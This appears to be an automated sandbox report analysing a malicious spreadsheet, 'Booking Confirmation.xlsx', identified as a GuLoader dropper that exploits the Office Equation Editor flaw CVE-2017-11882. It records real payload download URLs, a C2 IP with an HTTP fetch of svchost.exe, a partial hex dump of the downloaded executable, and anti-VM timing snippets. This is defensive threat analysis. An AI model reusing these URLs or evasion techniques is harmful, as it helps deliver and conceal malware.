Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:	Booking Confirmation.xlsx
Analysis ID:	433966
MD5:	0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1:	48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256:	36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1134908
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: HEUR/AGEN.1134908

Found malware configuration

Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Virustotal: Detection: 28%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 14 Jun 2021 06:54:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 13 Jun 2021 20:01:48 GMTETag: "24000-5c4ab36086dc4"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 40 bb 60 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 a4 18 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 05 58 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 17 02 00 28 00 00 00 00 40 02 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 0e 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /nrsdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf

Jump to behavior

Source: global traffic

Source: F7B97C3D.emf.0.dr

String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96 NtAllocateVirtualMemory,	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7008 NtAllocateVirtualMemory,	4_2_003C7008
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50 NtAllocateVirtualMemory,	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7084 NtAllocateVirtualMemory,	4_2_003C7084
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4 NtAllocateVirtualMemory,	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C711E NtAllocateVirtualMemory,	4_2_003C711E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73 NtAllocateVirtualMemory,	4_2_003C6F73

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004018A4	4_2_004018A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405732	4_2_00405732
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CB831	4_2_003CB831
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7428	4_2_003C7428
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3427	4_2_003C3427
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3827	4_2_003C3827
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A1C	4_2_003C2A1C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0A1E	4_2_003C0A1E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C13	4_2_003C3C13
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C767F	4_2_003C767F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C73	4_2_003C3C73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A6F	4_2_003C6A6F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A5F	4_2_003C2A5F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3A43	4_2_003C3A43
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C38A5	4_2_003C38A5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48A3	4_2_003C48A3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A9F	4_2_003C6A9F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C22F7	4_2_003C22F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C76DF	4_2_003C76DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3AD7	4_2_003C3AD7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48C5	4_2_003C48C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C333D	4_2_003C333D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4927	4_2_003C4927
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7507	4_2_003C7507
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C757B	4_2_003C757B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3B73	4_2_003C3B73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73	4_2_003C6F73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D68	4_2_003C4D68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3947	4_2_003C3947
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C39B8	4_2_003C39B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D80	4_2_003C4D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C75F7	4_2_003C75F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0BDB	4_2_003C0BDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2	4_2_003C47D2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C33CF	4_2_003C33CF

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Booking Confirmation.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF0B4.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Booking Confirmation.xlsx

Static file information: File size 1286656 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004059CC pushfd ; iretd	4_2_004059D5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406199 push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00407E0A push ecx; iretd	4_2_00407E0C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004062BD push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402F0B push dword ptr [ebp-1Ch]; ret	4_2_0041B724
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409B16 push ecx; retf	4_2_00409B23
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1017 push 3966E195h; ret	4_2_003C1021
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2C7F push 8566E195h; ret	4_2_003C2C89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1697 push 9EF9818Fh; ret	4_2_003C16A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6D0B push 3966E195h; retf	4_2_003C6D15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2DEF push F6C88495h; ret	4_2_003C2DF9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C05EB push 38BAFB8Fh; ret	4_2_003C05F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1FE7 push F7BAE195h; ret	4_2_003C1FF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1DC7 push 38BAE195h; ret	4_2_003C1DD1

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Booking Confirmation.xlsx

Stream path 'EncryptedPackage' entropy: 7.99982364057 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C42D3		4_2_003C42D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2		4_2_003C37F2

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003C7154 second address: 00000000003C7154 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA021 second address: 00000000003CA078 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 53673179h 0x00000007 sub eax, 2CF91FC3h 0x0000000c xor eax, 4DAF12BEh 0x00000011 sub eax, 6BC10307h 0x00000016 cpuid 0x00000018 jmp 00007F767C7D7CDEh 0x0000001a pushad 0x0000001b rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003CA078 second address: 00000000003CA078 instructions:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2316

Thread sleep time: -360000s >= -30000s

Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_003C3427 rdtsc

4_2_003C3427

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B mov eax, dword ptr fs:[00000030h]	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61 mov eax, dword ptr fs:[00000030h]	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C68D1 mov eax, dword ptr fs:[00000030h]	4_2_003C68D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C9CCF mov eax, dword ptr fs:[00000030h]	4_2_003C9CCF
